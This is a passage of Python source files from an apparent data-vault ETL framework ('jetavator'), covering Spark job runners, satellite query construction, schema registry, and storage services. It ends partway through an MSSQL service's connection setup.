for job in self.ready_jobs.values():
job.run()
def _find_ready_jobs(self) -> None:
for job in self.blocked_jobs.values():
job.check_if_ready()
def _create_jobs(self) -> List[Job]:
return [
job
for source in self.project.sources.values()
for job in self._create_source_jobs(source)
] + [
job
for satellite in self.project.satellites.values()
for job in self._create_satellite_jobs(satellite)
] + [
job
for satellite_owner in self.project.satellite_owners.values()
if satellite_owner.satellites_containing_keys
for job in self._create_satellite_owner_jobs(satellite_owner)
]
def _job_class_by_name(self, name: str) -> Type[Job]:
return self.job_class.registered_subclass(name)
def _create_source_jobs(self, source: Source) -> List[Job]:
jobs = [
self._job_class_by_name("create_source")(self, source)
]
if self.compute_service.source_csv_exists(source.name):
jobs += [
self._job_class_by_name("drop_source")(self, source)
]
return jobs
def _create_satellite_jobs(self, satellite: Satellite) -> List[Job]:
return [
*self._job_class_by_name("input_keys").keys_for_satellite(self, satellite),
self._job_class_by_name("satellite_query")(self, satellite),
*self._job_class_by_name("produced_keys").keys_for_satellite(self, satellite),
*self._job_class_by_name("output_keys").keys_for_satellite(self, satellite),
self._job_class_by_name("serialise_satellite")(self, satellite)
]
def _create_satellite_owner_jobs(self, satellite_owner: SatelliteOwner) -> List[Job]:
return [
self._job_class_by_name("satellite_owner_keys")(self, satellite_owner),
self._job_class_by_name("serialise_satellite_owner")(self, satellite_owner),
self._job_class_by_name("star_data")(self, satellite_owner),
self._job_class_by_name("star_merge")(self, satellite_owner)
]
```
#### File: spark_runner/jobs/SparkSatelliteQuery.py
```python
from pyspark.sql import DataFrame
from typing import Dict, Any, Set, Iterator
from collections.abc import Mapping
import jinja2
from lazy_property import LazyProperty
from sqlalchemy import Column, select, cast, alias, literal_column, text, func
from sqlalchemy.sql.expression import Select
from sqlalchemy.types import Boolean
from jetavator.runners.jobs import SatelliteQuery
from jetavator.sql_model.functions import hash_keygen, hash_record
from jetavator.services import SparkStorageService
from .. import SparkSQLView
class StorageViewConnector(object):
loaded_view_keys: Set[str] = None
storage_service: SparkStorageService = None
def __init__(self, storage_service: SparkStorageService):
self.loaded_view_keys = set()
self.storage_service = storage_service
def add(self, key: str) -> None:
if key not in self.loaded_view_keys:
self.loaded_view_keys.add(key)
def connect_storage_views(self):
for view_name in self.loaded_view_keys:
self.storage_service.connect_storage_view(view_name)
def disconnect_storage_views(self):
for view_name in self.loaded_view_keys:
self.storage_service.disconnect_storage_view(view_name)
class StorageTable(object):
def __init__(self, table_name: str):
self.table_name = table_name
class StorageViewMapping(Mapping):
connector: StorageViewConnector = None
view_names: Dict[str, str] = None
def __init__(self, connector: StorageViewConnector, view_names: Dict[str, str]):
self.connector = connector
self.view_names = view_names
def __getitem__(self, k: str) -> str:
if k not in self.view_names:
raise ValueError(k)
value = self.view_names[k]
if isinstance(value, StorageTable):
self.connector.add(value.table_name)
return value.table_name
else:
return value
def __getattr__(self, item):
return self.get(item)
def __len__(self) -> int:
return len(self.view_names)
def __iter__(self) -> Iterator[str]:
return iter(self.get(k) for k in self.view_names)
class SparkSatelliteQuery(SparkSQLView, SatelliteQuery, register_as='satellite_query'):
sql_template = '{{job.sql}}'
checkpoint = True
global_view = False
connector: StorageViewConnector = None
user_query_sql: str = None
def __init__(self, *args: Any, **kwargs: Any):
super().__init__(*args, **kwargs)
self.connector = StorageViewConnector(self.runner.compute_service.vault_storage_service)
if self.satellite.pipeline.type == "sql":
self.user_query_sql = jinja2.Template(self.satellite.pipeline.sql).render(self.table_aliases)
assert self.sql is not None
def execute(self) -> DataFrame:
self.connector.connect_storage_views()
result = super().execute()
self.connector.disconnect_storage_views()
return result
@LazyProperty
def table_aliases(self) -> Dict[str, Any]:
return {
'source': StorageViewMapping(self.connector, {
source.name: f'source_{source.name}'
for source in self.satellite.project.sources.values()
}),
'hub': {
hub.name: StorageViewMapping(self.connector, {
'current': StorageTable(f'vault_{hub.full_name}'),
'updates': (
'vault_updates'
f'_{hub.full_name}'
f'_{self.satellite.full_name}'
),
})
for hub in self.satellite.project.hubs.values()
},
'link': {
link.name: StorageViewMapping(self.connector, {
'current': StorageTable(f'vault_{link.full_name}'),
'updates': (
'vault_updates'
f'_{link.full_name}'
f'_{self.satellite.full_name}'
),
})
for link in self.satellite.project.links.values()
},
'satellite': {
satellite.name: StorageViewMapping(self.connector, {
'current': StorageTable(f'vault_now_{satellite.name}'),
'history': StorageTable(f'vault_history_{satellite.name}'),
'updates': f'vault_updates_{satellite.full_name}'
})
for satellite in self.satellite.project.satellites.values()
}
}
@property
def sql(self) -> str:
return self.runner.compute_service.compile_sqlalchemy(
self.pipeline_query())
def pipeline_query(self) -> Select:
if self.satellite.pipeline.type == "source":
return self.source_pipeline_query()
else:
return self.sql_pipeline_query()
def source_pipeline_query(self) -> Select:
source_table = self.satellite.pipeline.source.table
return self._build_pipeline_query(
source_query=source_table,
load_dt_column=source_table.c.jetavator_load_dt.label(
"sat_load_dt"),
deleted_ind_column=source_table.c.jetavator_deleted_ind.label(
"sat_deleted_ind")
)
def sql_pipeline_query(self) -> Select:
sql_query_columns = [
Column(key_column)
for key_column in self.satellite.pipeline.key_columns.values()
]
sql_query_columns += [
Column(column_name)
for column_name in self.satellite.columns.keys()
]
if self.satellite.pipeline.load_dt:
sql_query_columns.append(Column(self.satellite.pipeline.load_dt))
if self.satellite.pipeline.deleted_ind:
sql_query_columns.append(Column(self.satellite.pipeline.deleted_ind))
sql_query = alias(
text(self.user_query_sql).columns(*sql_query_columns),
name="sql_query"
)
if self.satellite.pipeline.load_dt:
load_dt_column = sql_query.c[self.satellite.pipeline.load_dt]
else:
load_dt_column = func.current_timestamp()
if self.satellite.pipeline.deleted_ind:
deleted_ind_column = sql_query.c[self.satellite.pipeline.deleted_ind]
else:
deleted_ind_column = literal_column("FALSE")
return self._build_pipeline_query(
source_query=sql_query,
load_dt_column=load_dt_column.label("sat_load_dt"),
deleted_ind_column=deleted_ind_column.label("sat_deleted_ind")
)
def _build_pipeline_query(
self,
source_query: Select,
load_dt_column: Column,
deleted_ind_column: Column
) -> Select:
source_inner_query = select([
*[
source_query.c[key_column].label(f"hub_{hub_name}_key")
for hub_name, key_column in self.satellite.pipeline.key_columns.items()
],
*[
cast(source_query.c[column.name], column.type).label(column.name)
for column in self.satellite.satellite_columns
],
load_dt_column,
cast(deleted_ind_column, Boolean()).label(deleted_ind_column.name)
]).alias("source_inner_query")
new_satellite_rows = alias(
select([
self.satellite.parent.generate_key(
source_inner_query
).label(self.satellite.parent.key_name),
*[
source_inner_query.c[column.name]
for column in self.satellite.parent.link_key_columns
],
func.coalesce(
source_inner_query.c.sat_load_dt,
func.current_timestamp()
).label("sat_load_dt"),
func.coalesce(
source_inner_query.c.sat_deleted_ind,
literal_column("FALSE")
).label("sat_deleted_ind"),
literal_column(f"'{self.satellite.name}'").label("sat_record_source"),
hash_record(
source_inner_query,
"sat_deleted_ind",
self.satellite.columns
).label("sat_record_hash"),
*[
source_inner_query.c[column_name]
for column_name in self.satellite.columns
]
]),
"new_satellite_rows"
)
def generate_table_keys(satellite_owner, source_table):
if satellite_owner.option("hash_key"):
hash_key = [hash_keygen(
source_table.c[satellite_owner.alias_key_name(satellite_owner.name)]
).label(satellite_owner.alias_hash_key_name(satellite_owner.name))]
else:
hash_key = []
return hash_key + [
source_table.c[satellite_owner.alias_key_name(satellite_owner.name)]
]
select_query = select([
*generate_table_keys(
self.satellite.parent,
new_satellite_rows),
*[
new_satellite_rows.c[column.name]
for column in self.satellite.parent.link_key_columns
],
new_satellite_rows.c.sat_load_dt,
new_satellite_rows.c.sat_deleted_ind,
new_satellite_rows.c.sat_record_source,
new_satellite_rows.c.sat_record_hash,
*[
new_satellite_rows.c[column_name]
for column_name in self.satellite.columns
]
])
return select_query
```
#### File: spark_runner/jobs/SparkSerialiseSatellite.py
```python
from pyspark.sql import DataFrame
from .. import SparkJob
from jetavator.runners.jobs import SerialiseSatellite
class SparkSerialiseSatellite(SparkJob, SerialiseSatellite, register_as='serialise_satellite'):
def execute(self) -> DataFrame:
return self.runner.compute_service.vault_storage_service.write_table(
table_name=self.satellite.table_name,
df=self.spark.table(self.satellite_query_job.name)
)
```
#### File: spark_runner/jobs/SparkStarMerge.py
```python
from pyspark.sql import DataFrame
from .. import SparkJob
from jetavator.runners.jobs import StarMerge
class SparkStarMerge(SparkJob, StarMerge, register_as='star_merge'):
def execute(self) -> DataFrame:
return self.runner.compute_service.star_storage_service.merge_from_spark_view(
storage_table_name=self.satellite_owner.star_table_name,
spark_view_name=self.star_data_job.name,
key_column_name=self.satellite_owner.key_column_name,
column_names=[
self.satellite_owner.key_column_name,
*(x.name for x in self.satellite_owner.link_key_columns),
*self.star_column_references.keys()
],
column_references=self.star_column_references
)
```
#### File: runners/spark_runner/SparkView.py
```python
from abc import ABC, abstractmethod
from pyspark.sql import DataFrame
from . import SparkJob, SparkSQLJob
LOG_ROW_COUNTS = True
SAMPLE_N_ROWS = 10
class SparkView(SparkJob, ABC):
"""
Base class for all Spark jobs that are registered in the metastore
as a temporary view after execution.
"""
@property
@abstractmethod
def checkpoint(self) -> bool:
"""
This property should be set to True if the a Spark local
checkpoint should be created for the resulting DataFrame.
"""
pass
@property
@abstractmethod
def global_view(self) -> bool:
"""
This property should be set to True if the temporary view
should be registered as a global view in the metastore.
"""
pass
@abstractmethod
def execute_view(self) -> DataFrame:
"""
Construct the underlying Spark DataFrame for this view.
"""
pass
def execute(self) -> DataFrame:
df = self.execute_view()
if self.checkpoint:
df = df.localCheckpoint()
# TODO: Make LOG_ROW_COUNTS configurable
if LOG_ROW_COUNTS:
self.logger.info(f'Row count: {self.name} ({df.count()} rows)')
# TODO: Make SAMPLE_N_ROWS configurable
if SAMPLE_N_ROWS:
df.limit(SAMPLE_N_ROWS).write.format("json").save(
f".jetavator/debug_samples"
f"/{self.runner.engine.config.session.run_uuid}/{self.name}.json")
if self.global_view:
df = df.createOrReplaceGlobalTempView(self.name)
else:
df = df.createOrReplaceTempView(self.name)
return df
class SparkSQLView(SparkView, SparkSQLJob, ABC):
"""
Base class for all Spark jobs that register a temporary view and
generate declarative Spark SQL to produce that view.
"""
def execute_view(self) -> DataFrame:
return self.execute_sql()
```
#### File: jetavator/schema_registry/SQLAlchemyRegistryService.py
```python
from typing import Union, Tuple, Iterator, Any
from collections.abc import Mapping
from jetavator.schema_registry.Project import Project
from jetavator.schema_registry.sqlalchemy_tables import Deployment
from jetavator.schema_registry.RegistryService import RegistryService
class SQLAlchemyRegistryService(RegistryService, Mapping, register_as="sqlalchemy_registry"):
loaded: Project = None
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
if self.config.model_path:
self.load_from_disk()
else:
self.load_from_database()
def __getitem__(
self,
key: Union[str, Tuple[str, str]]
) -> Project:
session = self.compute_service.session()
deployment = session.query(Deployment).get(key)
return Project.from_sqlalchemy_object(
self.config, self.compute_service, deployment)
def __len__(self) -> int:
return len(list(self.session().query(Deployment)))
def __iter__(self) -> Iterator[str]:
return iter(
deployment.version
for deployment in self.session().query(Deployment)
)
def session(self):
return self.owner.compute_service.session()
def load_from_disk(self) -> None:
self.loaded = Project.from_directory(
self.config,
self.compute_service,
self.config.model_path)
def load_from_database(self) -> None:
self.loaded = self.deployed
# TODO: Implement storage/retrieval of deployed definitions on Spark/Hive
@property
def deployed(self) -> Project:
# self.compute_service.test()
# session = self.compute_service.session()
# try:
# deployment = session.query(Deployment).order_by(
# Deployment.deploy_dt.desc()).first()
# retry = False
# except (ProgrammingError, OperationalError):
# deployment = Deployment()
# retry = False
# # if there is no deployment on Spark/Hive above piece fails.
# # for not loose fix is done by below if statement. needs to be
# # fixed with more logical code in future
# if deployment is None:
# deployment = Deployment()
# return Project.from_sqlalchemy_object(self, deployment)
return Project.from_sqlalchemy_object(
self.config, self.compute_service, Deployment())
def write_definitions_to_sql(self) -> None:
session = self.compute_service.session()
session.add(self.loaded.export_sqlalchemy_object())
session.add_all([
object_definition.export_sqlalchemy_object()
for object_definition in self.loaded.values()
])
session.commit()
session.close()
self.load_from_database()
```
#### File: jetavator/schema_registry/VaultObject.py
```python
from __future__ import annotations
from typing import Any, Dict, List
from abc import ABC, abstractmethod
from datetime import datetime
from collections import namedtuple
from lazy_property import LazyProperty
from .sqlalchemy_tables import ObjectDefinition
import wysdom
from jetavator.services import ComputeServiceABC
from .ProjectABC import ProjectABC
VaultObjectKey = namedtuple('VaultObjectKey', ['type', 'name'])
HubKeyColumn = namedtuple('HubKeyColumn', ['name', 'source'])
class VaultObject(wysdom.UserObject, wysdom.RegistersSubclasses, ABC):
name: str = wysdom.UserProperty(str)
type: str = wysdom.UserProperty(str)
optional_yaml_properties = []
def __init__(
self,
project: ProjectABC,
sqlalchemy_object: ObjectDefinition
) -> None:
self.project = project
self._sqlalchemy_object = sqlalchemy_object
super().__init__(self.definition)
def __repr__(self) -> str:
class_name = type(self).__name__
return f'{class_name}({self.name})'
@classmethod
def subclass_instance(
cls,
project: ProjectABC,
definition: ObjectDefinition
) -> VaultObject:
return cls.registered_subclass_instance(
definition.type,
project,
definition
)
@LazyProperty
def key(self) -> VaultObjectKey:
return VaultObjectKey(self.type, self.name)
@property
def definition(self) -> Dict[str, Any]:
return self._sqlalchemy_object.definition
def export_sqlalchemy_object(self) -> ObjectDefinition:
if self._sqlalchemy_object.version != str(self.project.version):
raise ValueError(
"ObjectDefinition version must match project version "
"and cannot be updated."
)
self._sqlalchemy_object.deploy_dt = str(datetime.now())
return self._sqlalchemy_object
@abstractmethod
def validate(self) -> None:
pass
@property
def compute_service(self) -> ComputeServiceABC:
return self.project.compute_service
@property
def full_name(self) -> str:
return f'{self.type}_{self.name}'
@property
def checksum(self) -> str:
return str(self._sqlalchemy_object.checksum)
@property
def dependent_satellites(self) -> List[VaultObject]:
return [
satellite
for satellite in self.project.satellites.values()
if any(
dependency.type == self.type
and dependency.name == self.name
for dependency in satellite.pipeline.dependencies
)
]
```
#### File: schema_registry/vault_object_types/Column.py
```python
import wysdom
from jetavator.schema_registry.vault_object_types.ColumnType import ColumnType
class Column(wysdom.UserObject):
_type: str = wysdom.UserProperty(str, name="type")
@property
def type(self) -> ColumnType:
return ColumnType(self._type)
```
#### File: schema_registry/vault_object_types/Link.py
```python
from typing import Dict
from sqlalchemy import literal_column, func
import wysdom
from ..VaultObject import HubKeyColumn
from .SatelliteOwner import SatelliteOwner
from .Hub import Hub
from .Satellite import Satellite
from .ColumnType import ColumnType
SEPARATOR = 31 # ASCII unit separator control character
class Link(SatelliteOwner, register_as="link"):
star_prefix = "fact"
# TODO: Rename link_hubs to hubs
_link_hubs: Dict[str, str] = wysdom.UserProperty(
wysdom.SchemaDict(str), name='link_hubs')
@property
def hubs(self) -> Dict[str, Hub]:
return {
k: self.project['hub', v]
for k, v in self._link_hubs.items()
}
@property
def satellites_containing_keys(self) -> Dict[str, Satellite]:
return self.star_satellites
@property
def key_length(self) -> int:
return sum([
hub.key_length + 1
for hub in self.hubs.values()
]) - 1
@property
def key_type(self) -> ColumnType:
return ColumnType(f"CHAR({self.key_length})")
@property
def unique_hubs(self) -> Dict[str, Hub]:
return {
hub_name: self.project["hub", hub_name]
for hub_name in set(x.name for x in self.hubs.values())
}
def hub_key_columns(self, satellite) -> Dict[str, HubKeyColumn]:
columns = {}
for alias, hub in self.hubs.items():
columns.setdefault(hub.name, []).append(
HubKeyColumn(f'hub_{alias}_key', f'hub_{hub.name}'))
return columns
def generate_key(self, from_table):
key_components = iter([
hub.prepare_key_for_link(hub_alias, from_table)
for hub_alias, hub in self.hubs.items()
])
composite_key = next(key_components)
for column in key_components:
composite_key = composite_key.concat(
func.char(literal_column(str(SEPARATOR)))
).concat(column)
return composite_key
@property
def link_key_columns(self):
return [
hub.alias_key_column(hub_alias)
for hub_alias, hub in self.hubs.items()
]
def validate(self) -> None:
for k, v in self._link_hubs.items():
if ('hub', v) not in self.project:
raise KeyError(
f"Cannot find referenced hub {v} in object {self.key}"
)
```
#### File: vault_object_types/pipelines/SatelliteSourcePipeline.py
```python
from typing import Dict, List
import wysdom
from .SatellitePipeline import SatellitePipeline
from .SatellitePipelineDependency import SatellitePipelineDependency
from ..Source import Source
class SatelliteSourcePipeline(
SatellitePipeline,
register_as="source"
):
type: str = wysdom.UserProperty(wysdom.SchemaConst('source'))
_source: str = wysdom.UserProperty(str, name="source")
@property
def key_columns(self) -> Dict[str, str]:
if self._key_columns:
return self._key_columns
else:
return {
key_column: source_column
for key_column, source_column in zip(
self.satellite.parent.hubs.keys(),
self.source.columns.keys()
)
}
@property
def source(self) -> Source:
# TODO: Refactor so this definitely returns Source, not VaultObject
source_obj = self.project["source", self._source]
assert isinstance(source_obj, Source)
return source_obj
@property
def dependencies(self) -> List[SatellitePipelineDependency]:
return [
SatellitePipelineDependency(
{'name': self._source, 'type': 'source'},
json_dom_info=wysdom.dom.DOMInfo(
document=wysdom.document(self), parent=self)
)
]
```
#### File: jetavator/schema_registry/YamlProjectLoader.py
```python
from typing import Any, Dict, List
import os
import yaml
from re import match
from contextlib import contextmanager
class YamlProjectLoader(object):
def __init__(
self,
model_path: str,
extension: str = "yaml"
) -> None:
self._model_path = model_path
self._extension = extension
def load_files(self) -> List[Dict[str, Any]]:
with self._cwd(self._model_path):
return [
self.load_yaml(
os.path.join(path, file)
)
for path, dirs, files in os.walk(".")
for file in files
if match(r"^.*\." + self._extension + "$", file)
]
@staticmethod
def load_yaml(file: str) -> Dict[str, Any]:
with open(file) as stream:
return yaml.safe_load(stream)
@staticmethod
@contextmanager
def _cwd(path):
old_pwd = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(old_pwd)
```
#### File: jetavator/services/SparkService.py
```python
from typing import Iterable, List, Set
from abc import ABC
import datetime
import os
import tempfile
import numpy as np
import pyspark
import sqlalchemy
import pandas
from pyspark.sql import SparkSession
from lazy_property import LazyProperty
from jetavator.sqlalchemy_delta import HiveWithDDLDialect
from .ComputeService import ComputeService
from .HiveMetastoreInterface import HiveMetastoreInterface
from .ExecutesSparkSQL import ExecutesSparkSQL
SPARK_APP_NAME = 'jetavator'
PYSPARK_COLUMN_TYPE_MAPPINGS = [
(sqlalchemy.types.String, pyspark.sql.types.StringType),
(sqlalchemy.types.Integer, pyspark.sql.types.IntegerType),
(sqlalchemy.types.Float, pyspark.sql.types.DoubleType),
(sqlalchemy.types.Date, pyspark.sql.types.DateType),
(sqlalchemy.types.DateTime, pyspark.sql.types.TimestampType)
]
def pyspark_column_type(sqlalchemy_column):
for sqlalchemy_type, pyspark_type in PYSPARK_COLUMN_TYPE_MAPPINGS:
if isinstance(sqlalchemy_column.type, sqlalchemy_type):
return pyspark_type()
class SparkService(ComputeService, ExecutesSparkSQL, HiveMetastoreInterface, ABC):
@property
def sqlalchemy_dialect(self) -> sqlalchemy.engine.interfaces.Dialect:
return HiveWithDDLDialect()
@LazyProperty
def spark(self):
builder = (
SparkSession
.builder
.appName(SPARK_APP_NAME)
.enableHiveSupport()
.config("spark.ui.showConsoleProgress", False)
.config("spark.jars.packages", ",".join(self.all_spark_jars_packages))
)
for storage_service in self.storage_services.values():
for k, v in storage_service.spark_config_options.items():
builder = builder.config(k, v)
spark_session = builder.getOrCreate()
spark_session.sparkContext.setLogLevel('ERROR')
return spark_session
@property
def spark_jars_packages(self) -> List[str]:
return []
@property
def all_spark_jars_packages(self) -> Set[str]:
return {
*self.spark_jars_packages,
*(
package
for storage_service in self.storage_services.values()
for package in storage_service.spark_jars_packages
)
}
def load_dataframe(
self,
dataframe: pandas.DataFrame,
source_name: str,
source_column_names: Iterable[str]
) -> None:
for column in source_column_names:
if column not in dataframe.columns:
dataframe[column] = np.nan
if 'jetavator_load_dt' not in dataframe.columns:
dataframe['jetavator_load_dt'] = datetime.datetime.now()
if 'jetavator_deleted_ind' not in dataframe.columns:
dataframe['jetavator_deleted_ind'] = 0
columns = list(source_column_names) + [
'jetavator_load_dt',
'jetavator_deleted_ind'
]
filename = f'{source_name}.csv'
with tempfile.TemporaryDirectory() as temp_path:
temp_csv_file = os.path.join(temp_path, filename)
(
dataframe
.reindex(
columns=columns)
.to_csv(
temp_csv_file,
index=False)
)
self.load_csv(temp_csv_file, source_name)
def load_csv(self, csv_file, source_name: str):
raise NotImplementedError
def csv_file_path(self, source_name: str):
raise NotImplementedError
def table_delta_path(self, sqlalchemy_table):
return (
'/tmp'
f'/{self.config.schema}'
f'/{sqlalchemy_table.name}'
)
def prepare_environment(self) -> None:
# TODO: Make this platform-independent - currently HIVE specific
# TODO: Is this obsolete now?
self.execute(
f'USE `{self.config.schema}`'
)
def sql_query_single_value(self, sql):
return self.execute(sql).iloc[0, 0]
def test(self):
assert self.sql_query_single_value("SELECT 1") == 1
return True
```
#### File: jetavator/services/StorageService.py
```python
from abc import ABC, abstractmethod
from typing import Iterable, Any, Dict, Optional, Set
import sqlalchemy
import sqlalchemy_views
import pandas
from jetavator import EngineABC
from jetavator.config import StorageServiceConfig
from .Service import Service
from .ComputeOwnedService import ComputeOwnedService
from .StorageServiceABC import StorageServiceABC
from .ExecutesSQL import ExecutesSQL
class StorageService(
ComputeOwnedService,
Service[StorageServiceConfig],
ExecutesSQL,
StorageServiceABC,
ABC
):
@property
def engine(self) -> EngineABC:
return self.owner.engine
def create_schema_if_missing(self) -> None:
if self.schema_exists:
if self.config.drop_schema_if_exists:
self.logger.info('Dropping and recreating database')
self.drop_schema()
self.create_schema()
elif (
not self.schema_empty
and not self.engine.config.skip_deploy
):
raise Exception(
f"Database {self.config.schema} already exists, "
"is not empty, and config.drop_schema_if_exists "
"is set to False."
)
else:
self.logger.info(f'Creating database {self.config.schema}')
self.create_schema()
def create_table(self, sqlalchemy_table: sqlalchemy.schema.CreateTable) -> None:
self.execute_sql_element(sqlalchemy_table)
def create_tables(
self,
sqlalchemy_tables: Iterable[sqlalchemy.schema.CreateTable]
) -> None:
for table in sqlalchemy_tables:
self.create_table(table)
def create_view(self, sqlalchemy_view: sqlalchemy_views.CreateView) -> None:
self.execute_sql_element(sqlalchemy_view)
def create_views(
self,
sqlalchemy_views: Iterable[sqlalchemy_views.CreateView]
) -> None:
for view in sqlalchemy_views:
self.create_view(view)
def execute_sql_elements_async(
self,
sql_elements: Iterable[sqlalchemy.sql.expression.ClauseElement]
) -> None:
# TODO: Implement async execution
for element in sql_elements:
self.execute_sql_element(element)
@abstractmethod
def sql_query_single_value(self, sql: str) -> Any:
pass
def execute_sql_element(
self,
sqlalchemy_element: sqlalchemy.sql.expression.ClauseElement,
async_cursor: bool = False
) -> pandas.DataFrame:
# TODO: Implement or deprecate async_cursor
return self.execute(self.compile_sqlalchemy(sqlalchemy_element))
@abstractmethod
def test(self) -> None:
pass
@property
def index_option_kwargs(self) -> Set[str]:
return set()
@abstractmethod
def load_dataframe(
self,
dataframe: pandas.DataFrame,
source_name: str,
source_column_names: Iterable[str]
) -> None:
pass
@abstractmethod
def merge_from_spark_view(
self,
storage_table_name: str,
spark_view_name: str,
key_column_name: str,
column_names: Iterable[str],
column_references: Dict[str, str],
deleted_indicator: Optional[str] = None
):
pass
```
#### File: jetavator/sql_model/ProjectModel.py
```python
from typing import List
from lazy_property import LazyProperty
from sqlalchemy.schema import DDLElement
from sqlalchemy import MetaData
from jetavator.sql_model.ProjectModelABC import ProjectModelABC
from jetavator.config import Config
from jetavator.services import ComputeService
from jetavator.schema_registry import Project, VaultObjectMapping
from .BaseModel import BaseModel
from .SatelliteModel import SatelliteModel
SCHEMAS = [
"jetavator",
"source",
"source_history",
"source_error",
"source_updates",
"vault",
"vault_history",
"vault_updates",
"vault_now",
"star",
]
class ProjectModel(VaultObjectMapping[BaseModel], ProjectModelABC):
def __init__(
self,
config: Config,
compute_service: ComputeService,
new_definition: Project,
old_definition: Project
) -> None:
super().__init__()
self._config = config
self.compute_service = compute_service
self.new_definition = new_definition
self.old_definition = old_definition
keys = (
set(self.new_definition.keys()) |
set(self.old_definition.keys())
)
self._data = {
key: BaseModel.subclass_instance(
self,
self.new_definition.get(key),
self.old_definition.get(key)
)
for key in keys
}
@property
def config(self) -> Config:
return self._config
@LazyProperty
def metadata(self) -> MetaData:
return MetaData()
def create_tables_ddl(self) -> List[DDLElement]:
files = []
for satellite_owner_model in self.satellite_owners.values():
files += satellite_owner_model.files
for satellite_model in self.satellites.values():
files += satellite_model.files
return files
def create_history_views(self) -> List[DDLElement]:
return [
view
for satellite_model in self.satellites.values()
if isinstance(satellite_model, SatelliteModel)
for view in satellite_model.history_views
]
def create_current_views(self) -> List[DDLElement]:
return [
view
for satellite_model in self.satellites.values()
if isinstance(satellite_model, SatelliteModel)
for view in satellite_model.current_views
]
```
#### File: jetavator/sql_model/SatelliteOwnerModel.py
```python
from typing import Optional, Dict, List
from abc import ABC, abstractmethod
from sqlalchemy import Table, Column, Index, PrimaryKeyConstraint
from sqlalchemy.schema import SchemaItem, DDLElement
from sqlalchemy.types import *
from jetavator.schema_registry import SatelliteOwner
from jetavator.services import StorageService
from ..VaultAction import VaultAction
from .BaseModel import BaseModel
from .SatelliteModelABC import SatelliteModelABC
from .functions import hash_keygen
class SatelliteOwnerModel(BaseModel[SatelliteOwner], ABC, register_as="satellite_owner"):
@property
def files(self) -> List[DDLElement]:
return self.vault_files() + self.star_files()
def vault_files(self) -> List[DDLElement]:
if self.action == VaultAction.CREATE:
return self.create_tables(self.tables)
else:
return []
def star_files(self, with_index=False) -> List[DDLElement]:
if self.definition.exclude_from_star_schema:
return []
else:
return (
self.create_or_alter_tables(self.star_tables, with_index)
)
# @property
# def create_views(self) -> List[CreateView]:
# return [CreateView(
# self.updates_pit_view,
# self.updates_pit_view_query
# )]
#
# @property
# def drop_views(self) -> List[DropView]:
# return [DropView(self.updates_pit_view)]
@property
def tables(self) -> List[Table]:
return [
self.table
]
@property
def star_tables(self) -> List[Table]:
return [
self.star_table
]
@property
def star_prefix(self) -> str:
return self.definition.star_prefix
@property
def key_columns(self) -> List[Column]:
return self.definition.alias_key_columns(self.definition.name)
def index_kwargs(
self,
storage_service: StorageService
) -> Dict[str, bool]:
return {
x: self.definition.option(x)
for x in storage_service.index_option_kwargs
}
def index(
self,
storage_service: StorageService,
name: str,
alias: Optional[str] = None
) -> Index:
alias = alias or self.definition.name
return Index(
f"ix_{name}",
self.definition.alias_primary_key_column(alias),
unique=False,
**self.index_kwargs(storage_service)
)
def index_or_key(
self,
storage_service: StorageService,
name: str,
alias: Optional[str] = None
) -> SchemaItem:
alias = alias or self.definition.name
if self.definition.option("no_primary_key"):
return self.index(storage_service, name, alias)
else:
return PrimaryKeyConstraint(
self.definition.alias_primary_key_name(alias),
name=f"pk_{name}",
**self.index_kwargs(storage_service)
)
def custom_indexes(self, table_name) -> List[Index]:
return [
index
for satellite_model in self.star_satellite_models.values()
for index in satellite_model.custom_indexes(table_name)
]
@property
def record_source_columns(self) -> List[Column]:
return [
Column(f"{self.definition.type}_load_dt", DateTime(), nullable=True),
Column(f"{self.definition.type}_record_source", String(), nullable=True),
]
@property
@abstractmethod
def role_specific_columns(self) -> List[Column]:
pass
@property
def table_columns(self) -> List[Column]:
return [
*self.key_columns,
*self.record_source_columns,
*self.role_specific_columns
]
@property
def table(self) -> Table:
return self.define_table(
self.definition.table_name,
*self.table_columns,
self.index_or_key(
self.vault_storage_service,
f"{self.definition.type}_{self.definition.name}"),
*self.satellite_owner_indexes(
self.vault_storage_service,
f"{self.definition.type}_{self.definition.name}"),
schema=self.vault_schema
)
@property
def star_satellite_columns(self) -> List[Column]:
return [
column
for satellite_model in self.star_satellite_models.values()
for column in satellite_model.satellite_columns
]
@property
def star_table(self) -> Table:
return self.define_table(
self.definition.star_table_name,
*self.key_columns,
*self.role_specific_columns,
*self.star_satellite_columns,
self.index_or_key(
self.star_storage_service,
f"{self.star_prefix}_{self.definition.name}"),
*self.satellite_owner_indexes(
self.star_storage_service,
f"{self.star_prefix}_{self.definition.name}"),
*self.custom_indexes(
f"{self.star_prefix}_{self.definition.name}"),
schema=self.star_schema
)
@property
def star_satellite_models(self) -> Dict[str, SatelliteModelABC]:
return {
satellite_model.definition.name: satellite_model
for satellite_model in self.project.satellites.values()
if satellite_model.definition.parent.key == self.definition.key
and satellite_model.action != VaultAction.DROP
and not satellite_model.definition.exclude_from_star_schema
}
@abstractmethod
def satellite_owner_indexes(
self,
storage_service: StorageService,
table_name: str
) -> List[Index]:
pass
def generate_table_keys(self, source_table, alias=None):
alias = alias or self.definition.name
if self.definition.option("hash_key"):
hash_key = [hash_keygen(
source_table.c[self.definition.alias_key_name(alias)]
).label(self.definition.alias_hash_key_name(alias))]
else:
hash_key = []
return hash_key + [
source_table.c[self.definition.alias_key_name(alias)]
]
```
#### File: jetavator/sql_model/SourceModel.py
```python
from sqlalchemy.sql.ddl import DDLElement
from typing import List
from jetavator.schema_registry import Source
from .BaseModel import BaseModel
class SourceModel(BaseModel[Source], register_as="source"):
@property
def files(self) -> List[DDLElement]:
return []
```
|
{
"source": "jetavator/jetavator_mssql",
"score": 2
}
|
#### File: jetavator_mssql/services/MSSQLService.py
```python
from typing import Iterable, Set
import pandas
import sqlalchemy
from sqlalchemy.exc import ProgrammingError, DBAPIError
from lazy_property import LazyProperty
from jetavator.services import StorageService
class MSSQLService(StorageService, register_as='mssql'):
index_option_kwargs: Set[str] = {"mssql_clustered"}
@LazyProperty
def sqlalchemy_connection(self):
if self.config.trusted_connection:
return sqlalchemy.create_engine(
"mssql+pyodbc://{server}:1433/{database}"
"?driver=ODBC+Driver+17+for+SQL+Server".format(
server=self.config.server,
database=self.config.database
),
connect_args={'autocommit': True},
deprecate_large_types=True
)
else:
return sqlalchemy.create_engine(
"mssql+pyodbc://{username}:{password}@{server}:1433/{database}"
"?driver=ODBC+Driver+17+for+SQL+Server".format(
